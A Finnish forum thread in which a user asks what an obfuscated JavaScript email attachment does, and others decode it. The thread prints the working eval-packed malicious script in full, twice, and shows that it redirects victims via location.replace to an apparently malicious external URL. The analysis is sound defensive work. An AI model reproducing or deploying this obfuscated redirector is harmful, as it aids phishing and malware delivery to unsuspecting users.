Sain oheisen javascript haitakkeen sähköpostiin ja ihan pervosta uteliaisuudesta kiinnostaisi ymmärtää mitä se tekee ja ymmärtää sitä. On kuitenkin sen verran kryptistä sotkua ettei omat taitoni siihen riitä, osaako täällä joku tulkata tuota? Tuo oli siis vielä hex koodattuna, mutta pyöräytin sen asciiksi.
var _$_a404=[N(m,c,h){N z(i){M(i<O?'':z(1g(i/O)))+((i=i%O)>1h?1i.1j(i+1k):i.1l(1m))}1n(P i=0;i<m.1o;i++)h[z(i)]=m[i];N d(w){M h[w]?h[w]:w};M c.1f(/\b\w+\b/g,d)}('P|1p|1r|1s|1t|1u|1v|1w|N|1x|1y|1z|1A|1d|1e|14|M|S|T|U|V|X|Y|Z|10|R|11|13|15|16|17|18|19|1a|1b|12||||Q|W|1B|1q|1C|1H|1D|1E|1F'.1G('|'),'0 1=[\'\\2\\3\\4\\5\\6\\7\\3\'];(8(A,B){0 C=8(9){a(--9){A[\'b\'](A[\'c\']());}};C(++B);}(1,d));0 e=8(A,B){A=A-f;0 C=1[A];g C;};0 h=[\'\\i\\j\\j\\4\\k\\l\\l\\j\\i\\6\\m\\n\\5\\o\\m\\n\\n\\2\\o\\p\\4\\q\\r\\7\\o\\s\\l\\t\\u\\v\\w\\x\\y\\z\\D\\v\\E\\F\\G\\E\\u\\H\\I\\r\\J\\i\\j\\s\\5\\r\\4\\i\\4\',e(\'f\')];K[h[L]](h[f]);',{}))|split||||||||||||||||||||||||||||||||||||||||||||||||return|function|62|var|x54|x75|_0x56fd60|x68|x74|x3a|x4e|x2f|x6e|x67|x6f|x73|x57|x2e|0x0|x6d|x5f|x49|x5a|x52|x47|x50|eval|0x107|_0x3737|replace|parseInt|35|String|fromCharCode|29|toString|36|for|length|_0x2465|x36|x72|x65|x70|x6c|x61|x63|_0x42d372|while|push|shift|x58|x33|x78|location|0x1|split|x4d fromCharCode, "toString", "replace", "\w+", "\b", "g"];eval(function(_0x22539,_0x223A4,_0x223F5,_0x224E8,_0x22497,_0x22446){_0x22497= function(_0x223F5){return (_0x223F5< _0x223A4?_$_a404[4]:_0x22497(parseInt(_0x223F5/ _0x223A4)))+ ((_0x223F5= _0x223F5% _0x223A4)> 35?String[_$_a404[5]](_0x223F5+ 29):_0x223F5[_$_a404[6]](36))};if(!_$_a404[4][_$_a404[7]](/^/,String)){while(_0x223F5--){_0x22446[_0x22497(_0x223F5)]= _0x224E8[_0x223F5]|| _0x22497(_0x223F5)};_0x224E8= [function(_0x22497){return _0x22446[_0x22497]}];_0x22497= function(){return _$_a404[8]};_0x223F5= 1};while(_0x223F5--){if(_0x224E8[_0x223F5]){_0x22539= _0x22539[_$_a404[7]]( new RegExp(_$_a404[9]+ _0x22497(_0x223F5)+ _$_a404[9],_$_a404[10]),_0x224E8[_0x223F5])}};return _0x22539}(_$_a404[0],62,106,_$_a404[3][_$_a404[2]](_$_a404[1]),0,{}))
Oletko varma että muunsit sen oikein asciiksi? Tuohan ei ole syntaktillisesti oikeaa JavaScriptiä, vaan luulen että siihen pitää tehdä joitakin muunnoksia ennen kuin se voidaan ajaa.
Kohdasta ('P|1p|1r...
alkaen tuossa näyttäsi olevan jonkinlainen muunnostaulu, sillä koodissa on paljon 1:llä alkavia saneita, jotka pitäisi muuntaa toisiksi. Esim. 1G
:n pitäisi varmaankin olla split
. Koodista näyttäisi kuitenkin puuttuvan se osa, joka tekee muunnoksen (tai koodi on muunnettu jotenkin väärin). eval(function(...
-kohdan jälkeen koodi näyttää validilta.
Terve!
En todellakaan ole varma muunnoksesta, sen verran oksennusta se oli, laitan uudelleen koodin sellaisena kuin se alkuperäisenä tuli liitetiedostossa.
var _$_a404=["\x31\x63\x28\x4E\x28\x6D\x2C\x63\x2C\x68\x29\x7B\x4E\x20\x7A\x28\x69\x29\x7B\x4D\x28\x69\x3C\x4F\x3F\x27\x27\x3A\x7A\x28\x31\x67\x28\x69\x2F\x4F\x29\x29\x29\x2B\x28\x28\x69\x3D\x69\x25\x4F\x29\x3E\x31\x68\x3F\x31\x69\x2E\x31\x6A\x28\x69\x2B\x31\x6B\x29\x3A\x69\x2E\x31\x6C\x28\x31\x6D\x29\x29\x7D\x31\x6E\x28\x50\x20\x69\x3D\x30\x3B\x69\x3C\x6D\x2E\x31\x6F\x3B\x69\x2B\x2B\x29\x68\x5B\x7A\x28\x69\x29\x5D\x3D\x6D\x5B\x69\x5D\x3B\x4E\x20\x64\x28\x77\x29\x7B\x4D\x20\x68\x5B\x77\x5D\x3F\x68\x5B\x77\x5D\x3A\x77\x7D\x3B\x4D\x20\x63\x2E\x31\x66\x28\x2F\x5C\x62\x5C\x77\x2B\x5C\x62\x2F\x67\x2C\x64\x29\x7D\x28\x27\x50\x7C\x31\x70\x7C\x31\x72\x7C\x31\x73\x7C\x31\x74\x7C\x31\x75\x7C\x31\x76\x7C\x31\x77\x7C\x4E\x7C\x31\x78\x7C\x31\x79\x7C\x31\x7A\x7C\x31\x41\x7C\x31\x64\x7C\x31\x65\x7C\x31\x34\x7C\x4D\x7C\x53\x7C\x54\x7C\x55\x7C\x56\x7C\x58\x7C\x59\x7C\x5A\x7C\x31\x30\x7C\x52\x7C\x31\x31\x7C\x31\x33\x7C\x31\x35\x7C\x31\x36\x7C\x31\x37\x7C\x31\x38\x7C\x31\x39\x7C\x31\x61\x7C\x31\x62\x7C\x31\x32\x7C\x7C\x7C\x7C\x51\x7C\x57\x7C\x31\x42\x7C\x31\x71\x7C\x31\x43\x7C\x31\x48\x7C\x31\x44\x7C\x31\x45\x7C\x31\x46\x27\x2E\x31\x47\x28\x27\x7C\x27\x29\x2C\x27\x30\x20\x31\x3D\x5B\x5C\x27\x5C\x5C\x32\x5C\x5C\x33\x5C\x5C\x34\x5C\x5C\x35\x5C\x5C\x36\x5C\x5C\x37\x5C\x5C\x33\x5C\x27\x5D\x3B\x28\x38\x28\x41\x2C\x42\x29\x7B\x30\x20\x43\x3D\x38\x28\x39\x29\x7B\x61\x28\x2D\x2D\x39\x29\x7B\x41\x5B\x5C\x27\x62\x5C\x27\x5D\x28\x41\x5B\x5C\x27\x63\x5C\x27\x5D\x28\x29\x29\x3B\x7D\x7D\x3B\x43\x28\x2B\x2B\x42\x29\x3B\x7D\x28\x31\x2C\x64\x29\x29\x3B\x30\x20\x65\x3D\x38\x28\x41\x2C\x42\x29\x7B\x41\x3D\x41\x2D\x66\x3B\x30\x20\x43\x3D\x31\x5B\x41\x5D\x3B\x67\x20\x43\x3B\x7D\x3B\x30\x20\x68\x3D\x5B\x5C\x27\x5C\x5C\x69\x5C\x5C\x6A\x5C\x5C\x6A\x5C\x5C\x34\x5C\x5C\x6B\x5C\x5C\x6C\x5C\x5C\x6C\x5C\x5C\x6A\x5C\x5C\x69\x5C\x5C\x36\x5C\x5C\x6D\x5C\x5C\x6E\x5C\x5C\x35\x5C\x5C\x6F\x5C\x5C\x6D\x5C\x5C\x6E\x5C\x5C\x6E\x5C\x5C\x32\x5C\x5C\x6F\x5C\x5C\x70\x5C\x5C\x34\x5C\x5C\x71\x5C\x5C\x72\x5C\x5C\x37\x5C\x5C\x6F\x5C\x5C\x73\x5C\x5C\x6C\x5C\x5C\x74\x5C\x5C\x75\x5C\x5C\x76\x5C\x5C\x77\x5C\x5C\x78\x5C\x5C\x79\x5C\x5C\x7A\x5C\x5C\x44\x5C\x5C\x76\x5C\x5C\x45\x5C\x5C\x46\x5C\x5C\x47\x5C\x5C\x45\x5C\x5C\x75\x5C\x5C\x48\x5C\x5C\x49\x5C\x5C\x72\x5C\x5C\x4A\x5C\x5C\x69\x5C\x5C\x6A\x5C\x5C\x73\x5C\x5C\x35\x5C\x5C\x72\x5C\x5C\x34\x5C\x5C\x69\x5C\x5C\x34\x5C\x27\x2C\x65\x28\x5C\x27\x66\x5C\x27\x29\x5D\x3B\x4B\x5B\x68\x5B\x4C\x5D\x5D\x28\x68\x5B\x66\x5D\x29\x3B\x27\x2C\x7B\x7D\x29\x29","\x7C","\x73\x70\x6C\x69\x74","\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x72\x65\x74\x75\x72\x6E\x7C\x66\x75\x6E\x63\x74\x69\x6F\x6E\x7C\x36\x32\x7C\x76\x61\x72\x7C\x78\x35\x34\x7C\x78\x37\x35\x7C\x5F\x30\x78\x35\x36\x66\x64\x36\x30\x7C\x78\x36\x38\x7C\x78\x37\x34\x7C\x78\x33\x61\x7C\x78\x34\x65\x7C\x78\x32\x66\x7C\x78\x36\x65\x7C\x78\x36\x37\x7C\x78\x36\x66\x7C\x78\x37\x33\x7C\x78\x35\x37\x7C\x78\x32\x65\x7C\x30\x78\x30\x7C\x78\x36\x64\x7C\x78\x35\x66\x7C\x78\x34\x39\x7C\x78\x35\x61\x7C\x78\x35\x32\x7C\x78\x34\x37\x7C\x78\x35\x30\x7C\x65\x76\x61\x6C\x7C\x30\x78\x31\x30\x37\x7C\x5F\x30\x78\x33\x37\x33\x37\x7C\x72\x65\x70\x6C\x61\x63\x65\x7C\x70\x61\x72\x73\x65\x49\x6E\x74\x7C\x33\x35\x7C\x53\x74\x72\x69\x6E\x67\x7C\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65\x7C\x32\x39\x7C\x74\x6F\x53\x74\x72\x69\x6E\x67\x7C\x33\x36\x7C\x66\x6F\x72\x7C\x6C\x65\x6E\x67\x74\x68\x7C\x5F\x30\x78\x32\x34\x36\x35\x7C\x78\x33\x36\x7C\x78\x37\x32\x7C\x78\x36\x35\x7C\x78\x37\x30\x7C\x78\x36\x63\x7C\x78\x36\x31\x7C\x78\x36\x33\x7C\x5F\x30\x78\x34\x32\x64\x33\x37\x32\x7C\x77\x68\x69\x6C\x65\x7C\x70\x75\x73\x68\x7C\x73\x68\x69\x66\x74\x7C\x78\x35\x38\x7C\x78\x33\x33\x7C\x78\x37\x38\x7C\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x7C\x30\x78\x31\x7C\x73\x70\x6C\x69\x74\x7C\x78\x34\x64","","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x74\x6F\x53\x74\x72\x69\x6E\x67","\x72\x65\x70\x6C\x61\x63\x65","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function(_0x22539,_0x223A4,_0x223F5,_0x224E8,_0x22497,_0x22446){_0x22497= function(_0x223F5){return (_0x223F5< _0x223A4?_$_a404[4]:_0x22497(parseInt(_0x223F5/ _0x223A4)))+ ((_0x223F5= _0x223F5% _0x223A4)> 35?String[_$_a404[5]](_0x223F5+ 29):_0x223F5[_$_a404[6]](36))};if(!_$_a404[4][_$_a404[7]](/^/,String)){while(_0x223F5--){_0x22446[_0x22497(_0x223F5)]= _0x224E8[_0x223F5]|| _0x22497(_0x223F5)};_0x224E8= [function(_0x22497){return _0x22446[_0x22497]}];_0x22497= function(){return _$_a404[8]};_0x223F5= 1};while(_0x223F5--){if(_0x224E8[_0x223F5]){_0x22539= _0x22539[_$_a404[7]]( new RegExp(_$_a404[9]+ _0x22497(_0x223F5)+ _$_a404[9],_$_a404[10]),_0x224E8[_0x223F5])}};return _0x22539}(_$_a404[0],62,106,_$_a404[3][_$_a404[2]](_$_a404[1]),0,{}))
Selkokielellä antamasi koodi on yksinkertaisuudessaan seuraavanlainen:
location.replace('http://thanglonggroups.com/_IZRGPWTZNX6NI3M.xhtml.php');
Koodi siis pyrkii ainoastaan uudelleenohjaamaan käyttäjän sivulle http://thanglonggroups.com/_IZRGPWTZNX6NI3M.
Aika olennainen ero ensimmäisessä ja jälkimmäisessä koodissasi on se, että jälkimmäinen sisältää 11 erillistä tekstiä lainausmerkeissä, kun taas ensimmäisessä olet jättänyt tekstistä lainausmerkit pois. Onhan "N()" aivan eri asia kuin N().
Koodin merkitys selviää vaiheittain, kun eval-kutsun tilalle vaihdetaan console.log tai alert. Tuloksena on vielä toinen kerros samanlaista kikkailua, ja kolmannesta kerroksesta paljastuu koodi, jonka lopussa asetetaan osoite.
Kiitoksia, nyt pääsin kärryille itsekkin, oli tuo kyllä melkoista oksennusta.
Aihe on jo aika vanha, joten et voi enää vastata siihen.